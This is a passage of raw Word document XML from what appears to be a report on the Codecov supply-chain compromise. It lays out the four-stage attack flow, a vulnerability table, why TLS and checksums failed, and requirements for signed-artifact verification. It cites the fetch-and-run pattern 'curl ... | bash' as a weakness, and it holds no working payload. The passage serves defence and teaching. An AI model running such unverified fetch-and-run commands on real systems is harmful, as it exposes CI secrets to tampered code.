            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="codecov_attack.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="1099419"/>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3.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Attack flow of the documented Codecov incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack chain has four stages: (1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>credential exposure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> through a build artifact (Docker image); (2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>unauthorised modification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the released artifact in cloud storage using that credential; (3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>trusted distribution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, where the modified file is served from the vendor's own domain over HTTPS; and (4) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>execution with privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside customers' CI, where the script can read every secret in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.4 Vulnerabilities Exploited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerabilities exploited in the incident</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="680"/>
        <w:gridCol w:w="4649"/>
        <w:gridCol w:w="3628"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Consequence</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V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Secret material recoverable from a published build artifact (Docker image)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Attacker obtains a working cloud credential</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V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Possession of a storage credential was enough to change a production release; no separation between storing and releasing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Release integrity depends on one secret</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V3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Consumers executed the downloaded script without mandatory cryptographic verification (e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl ... | bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tampering is invisible to customers</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V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Checksums were not bound to a vendor signature and checking was manual and optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A hash that can be replaced or ignored gives no authenticity</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V5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The script ran with access to every CI secret (excessive privilege)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>One malicious line exposes all credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>V6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>No tamper-evident release log or monitoring of release content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Compromise persisted for about two months</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.5 Why TLS and a Published Checksum Were Not Enough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS/TLS authenticates the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and protects bytes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in transit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. It says nothing about whether the file stored on that server is the one the vendor's release process produced. In the Codecov case the malicious file sat on the legitimate server, so TLS delivered it perfectly. A published checksum only helps if (a) the customer actually checks it on every run and (b) the checksum itself is authentic. An attacker who can replace a file can often replace a checksum stored next to it. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hashing gives integrity relative to a reference value; only a digital signature, verified with a trusted public key, gives authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.6 Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Design and implement a mechanism by which a software customer's CI/CD pipeline automatically and cryptographically verifies, before execution or deployment, that a vendor artifact (i) is bit-for-bit identical to what the vendor's authorised release process produced, (ii) was signed by a currently trusted, non-revoked vendor key, (iii) is not an old or revoked version replayed by an attacker, and (iv) was built by an approved builder from an approved source. Any failure must stop the pipeline, raise a security event and be recorded in a tamper-evident log, even if the distribution server or network is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.7 Scope and Assumptions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>distribution infrastructure (registry, CDN, network) is untrusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: the attacker may modify any file on it, exactly as in the incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The vendor's signing keys are protected by a signing service (HSM/KMS in production); key theft is analysed as a separate threat (Chapter 6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Customers obtain the vendor's root public key once through an authentic out-of-band channel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The demonstration is fully local and safe: it never contacts Codecov or any external system, and the tampered script is never executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SYSTEM REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.1 Security Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Security requirements</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="680"/>
        <w:gridCol w:w="3402"/>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="3402"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mechanism</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SR1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Detect any modification of a released artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
